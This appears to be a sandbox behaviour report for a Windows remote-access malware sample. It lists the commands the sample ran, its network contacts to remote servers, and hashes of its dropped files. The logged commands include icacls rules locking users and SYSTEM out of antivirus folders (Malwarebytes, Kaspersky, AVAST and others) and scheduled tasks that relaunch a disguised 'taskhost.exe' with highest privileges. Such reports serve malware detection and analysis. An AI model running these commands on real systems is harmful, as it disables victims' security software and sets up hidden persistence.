C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11232489401536740187-2110687217978207949628197400-1414867754528139644130986386"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\system32\taskeng.exe

taskeng.exe {0A6996F7-B6EF-467F-9861-8FD42E1E7481} S-1-5-21-1083475884-596052423-1669053738-1000:WYZSGDWS\Admin:Interactive:[1]

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp

Files

memory/380-54-0x00000000765F1000-0x00000000765F3000-memory.dmp

memory/1988-55-0x0000000000000000-mapping.dmp

memory/796-56-0x0000000000000000-mapping.dmp

\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

memory/836-63-0x0000000000000000-mapping.dmp

C:\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

C:\ProgramData\Setup\update.exe

MD5 3e42af7f6db601b213d561875d372eef
SHA1 b8ae5b12ecead1b352db98c25517f482af094270
SHA256 ed39bf4f172680c31c5aafc734f5cfe57bc54b8ba39124451e9c83c20d0225a0
SHA512 3c13f392b854fb3e9703c9245a2fadb7585982443e0687def911b47bb0f9cddf942dfb775fb85875a6c1734ad2ecb2925d64366ac860f1a801fa09957709bb7c

\ProgramData\Microsoft\Intel\wini.exe

MD5 770fff853bc5b785524a5033d56994a9
SHA1 ab29b77554a893ec151093e75cc849bde4c40a44
SHA256 74c957325eeb381da0091487502854be1cd87ce9aefa326c6fc927c11d248f59
SHA512 7de03fa2e38e8e9e7df3e86528c0a187a13c80cacf646c13d0aaef7b4a41b4e729044bd99db31cdfad0e2f2e83dd5c742ab7979d10fab43835bdeaf90f0203fc

memory/952-68-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 770fff853bc5b785524a5033d56994a9
SHA1 ab29b77554a893ec151093e75cc849bde4c40a44
SHA256 74c957325eeb381da0091487502854be1cd87ce9aefa326c6fc927c11d248f59
SHA512 7de03fa2e38e8e9e7df3e86528c0a187a13c80cacf646c13d0aaef7b4a41b4e729044bd99db31cdfad0e2f2e83dd5c742ab7979d10fab43835bdeaf90f0203fc

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 770fff853bc5b785524a5033d56994a9
SHA1 ab29b77554a893ec151093e75cc849bde4c40a44
SHA256 74c957325eeb381da0091487502854be1cd87ce9aefa326c6fc927c11d248f59
SHA512 7de03fa2e38e8e9e7df3e86528c0a187a13c80cacf646c13d0aaef7b4a41b4e729044bd99db31cdfad0e2f2e83dd5c742ab7979d10fab43835bdeaf90f0203fc

memory/1816-72-0x0000000000000000-mapping.dmp

\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

memory/268-77-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

C:\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

C:\ProgramData\Windows\winit.exe

MD5 408ab35a0ad04043f6d680d9433dfd32
SHA1 56deed84a1e4ce6981f0e99c3f6726c0f27fa0e4
SHA256 d698a05760903f585add7aa1a7034b03038f289efc15bf5aa5e8d4d03b3bb526
SHA512 de11c8633a84480fdb642cb53e32bb55eb47394fbdae5775be06cee6ec77a2170787954f9fda5c10783bf9c4d507ddcc444639a5e7c0e8e8a9d7480395c98ec9

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

memory/1264-84-0x0000000000000000-mapping.dmp

memory/928-85-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg1.reg

MD5 4dc0fba4595ad8fe1f010f9079f59dd3
SHA1 b3a54e99afc124c64978d48afca2544d75e69da5
SHA256 b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a
SHA512 fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8

memory/1680-88-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

memory/1092-91-0x0000000000000000-mapping.dmp

\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/1728-94-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/1728-97-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1728-98-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1728-99-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1728-100-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1728-101-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1728-102-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1536-104-0x0000000000000000-mapping.dmp

\ProgramData\install\cheat.exe

MD5 7057a4e52cf8ab993a57acbdb303e265
SHA1 a6306981e4d62916cc6d59a9e4e58846deaeb956
SHA256 e3725851f16bf3b10521b672a061ee766f536feedfdf941cb6ccf5f206af5ca7
SHA512 28d9980c0b676d6e79a31c6c65d5c89774d0885d82aa2f593c10ca7dfb10ab374ba82d4d86c362a82f9110793c0048bfc47ccddde4ae23afc512cff3b278d781

C:\ProgramData\install\cheat.exe

MD5 7057a4e52cf8ab993a57acbdb303e265
SHA1 a6306981e4d62916cc6d59a9e4e58846deaeb956
SHA256 e3725851f16bf3b10521b672a061ee766f536feedfdf941cb6ccf5f206af5ca7
SHA512 28d9980c0b676d6e79a31c6c65d5c89774d0885d82aa2f593c10ca7dfb10ab374ba82d4d86c362a82f9110793c0048bfc47ccddde4ae23afc512cff3b278d781

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/1940-107-0x0000000000000000-mapping.dmp

C:\programdata\install\cheat.exe

MD5 7057a4e52cf8ab993a57acbdb303e265
SHA1 a6306981e4d62916cc6d59a9e4e58846deaeb956
SHA256 e3725851f16bf3b10521b672a061ee766f536feedfdf941cb6ccf5f206af5ca7
SHA512 28d9980c0b676d6e79a31c6c65d5c89774d0885d82aa2f593c10ca7dfb10ab374ba82d4d86c362a82f9110793c0048bfc47ccddde4ae23afc512cff3b278d781

memory/1940-111-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1940-112-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1940-113-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1940-115-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1940-114-0x0000000000400000-0x0000000000AB9000-memory.dmp

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 fa0417708359040a397e75608c46594f
SHA1 59f54427eb9867da23de737456299718e9567a74
SHA256 bdea50cd4bd7a716a5e16ead55a07be92e5d6cd740ee16fc7c9eb2aba0f7bf47
SHA512 1087a7813b5210bbc075b2939c2a49c81891211d8b232cedfafd75d3109c9efda53076878294bec96a24f928f734c2430de0829ac02253802076be7130ee6902

memory/924-122-0x0000000000000000-mapping.dmp

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 fa0417708359040a397e75608c46594f
SHA1 59f54427eb9867da23de737456299718e9567a74
SHA256 bdea50cd4bd7a716a5e16ead55a07be92e5d6cd740ee16fc7c9eb2aba0f7bf47
SHA512 1087a7813b5210bbc075b2939c2a49c81891211d8b232cedfafd75d3109c9efda53076878294bec96a24f928f734c2430de0829ac02253802076be7130ee6902

memory/1324-121-0x0000000000000000-mapping.dmp

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 fa0417708359040a397e75608c46594f
SHA1 59f54427eb9867da23de737456299718e9567a74
SHA256 bdea50cd4bd7a716a5e16ead55a07be92e5d6cd740ee16fc7c9eb2aba0f7bf47
SHA512 1087a7813b5210bbc075b2939c2a49c81891211d8b232cedfafd75d3109c9efda53076878294bec96a24f928f734c2430de0829ac02253802076be7130ee6902

\ProgramData\Microsoft\Intel\taskhost.exe

MD5 fa0417708359040a397e75608c46594f
SHA1 59f54427eb9867da23de737456299718e9567a74
SHA256 bdea50cd4bd7a716a5e16ead55a07be92e5d6cd740ee16fc7c9eb2aba0f7bf47
SHA512 1087a7813b5210bbc075b2939c2a49c81891211d8b232cedfafd75d3109c9efda53076878294bec96a24f928f734c2430de0829ac02253802076be7130ee6902

memory/1940-117-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/924-128-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/924-127-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2028-130-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 fa0417708359040a397e75608c46594f
SHA1 59f54427eb9867da23de737456299718e9567a74
SHA256 bdea50cd4bd7a716a5e16ead55a07be92e5d6cd740ee16fc7c9eb2aba0f7bf47
SHA512 1087a7813b5210bbc075b2939c2a49c81891211d8b232cedfafd75d3109c9efda53076878294bec96a24f928f734c2430de0829ac02253802076be7130ee6902

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/924-129-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 fa0417708359040a397e75608c46594f
SHA1 59f54427eb9867da23de737456299718e9567a74
SHA256 bdea50cd4bd7a716a5e16ead55a07be92e5d6cd740ee16fc7c9eb2aba0f7bf47
SHA512 1087a7813b5210bbc075b2939c2a49c81891211d8b232cedfafd75d3109c9efda53076878294bec96a24f928f734c2430de0829ac02253802076be7130ee6902

memory/924-133-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/924-131-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1348-134-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

